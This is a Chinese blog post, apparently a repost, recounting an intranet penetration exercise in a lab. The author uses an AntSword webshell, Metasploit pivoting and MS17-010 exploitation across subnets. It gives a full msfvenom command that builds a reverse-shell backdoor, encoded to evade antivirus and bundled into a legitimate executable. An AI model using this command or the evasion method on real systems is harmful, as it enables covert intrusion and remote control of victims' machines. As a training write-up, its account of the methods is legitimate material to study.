內網滲透(蟻劍+MSF)


0x01 192.168.2.244攻擊

(1)使用的是之前本科實驗室的同學在192.168.2.244/bigdata上留的一句話木馬

 

 

 

(2)因為本人技術有限,只能采用上傳后門的方式來拿到shell,好在蟻劍足已滿足我上傳木馬的需求。在這一步只需要使用msf生成木馬(使用theFatRat生成的木馬穩定性不怎么滴,而且不能繞過火絨)。最后產生的木馬效果最好如下:

msf>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.4.215 LPORT=6227 -e x86/shikata_ga_nai -x IPradar5.exe -i 5 -f exe -o /root/Desktop/backdoor.exe

-e x86/shikata_ga_nai 此步意為使用shikata_ga_nai的編碼方式對攻擊載荷進行重新編碼,上文有講

-x IPradar5.exe 此步意為將木馬捆綁在指定的可執行程序模版上,此處為IPradar5.exe

-i 5 此處意為使用剛才設定的編碼方式對目標進行5次編碼(多次編碼理論上來講有助於免殺,但是也不一定,畢竟殺軟不是白收費的,免殺技術飛速發展,新的免殺技術一出現就會被各大安全廠商盯上的。。。。)

-f exe 此步意為指定MSF編碼器輸出格式為exe

-o /root/Desktop/backdoor.exe 此步意為指定處理完畢后的文件輸出路徑

本人自己寫了個exe程序來替代IPradar5.exe。能維持住運行就ok。其他的就和該模板一樣了。

3)使用蟻劍傳大馬

 

 

 

其中halo.exe的免殺與穩定性最好。同時使用該代碼的時候需要注意如果防御方管理員在線,則會直接關掉你的木馬,因此還需對其進行改進,但目前階段來說足夠了。

 

0x02 跳板機布置

在上一階段,我們拿到了反彈回來的244shell,這時后滲透階段神器meterpreter就要上線了。

第一步提權,從mysql的數據庫管理員上升到系統權限

 

第二步 建立路由

 

第三步,設代理

 

 

 

第四步,proxychainsnmap掃描

 

在設代理這里總會有一些問題,設置完本地走session的代理之后也不能全局使用proxychains來打。

0x03 攻擊三網段

(1)首先使用ms17_010的掃描模塊

 

在這里有9,20,23,43這三台主機上存在漏洞。我們開始一台一台來試

(2)展開攻擊

 

這里打3.9的時候看到有報錯,就很煩。之前connection reset by peer報錯在百度上搜索之后拘束和TCP協議的三次握手有關系,有可能是網速過慢或其他原因。

 

在這里,運氣爆棚!!!之前打192.168.3.43總會有connection報錯,不過這次會話最終也沒有維持太久。在給一位老哥看環境的時候就無情地斷掉了。(不過跳轉兩個會話地路由看着還是真的舒服)

0x04 boss

 

 

 

之后果斷接着對1.4的日志服務器逮着445一把梭,最后失敗.....這也是我目前為止走的最遠的一次了。

0xXX 后記

在本次整體的攻擊過程中,見到了多位大佬的神操作。比如3h大佬的爆破密碼技術和修改注冊表繞過不允許空密碼用戶遠程登陸,還有久哥使用ms17_command來實現任意代碼執行。同樣還見識到Cobalt Strike該滲透工具的強大。日后也准備自己租個公網服務器搭上一個。最后,雖然本次攻擊實驗 一邊滲透,一邊運維,晚上有時候還要值夜班為大佬們保證環境的穩定。但是,每一次成功彈回來shell的時候,每一次在熟悉的meterpreter出現在眼前的時候,就會發現這一切都是值得的。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM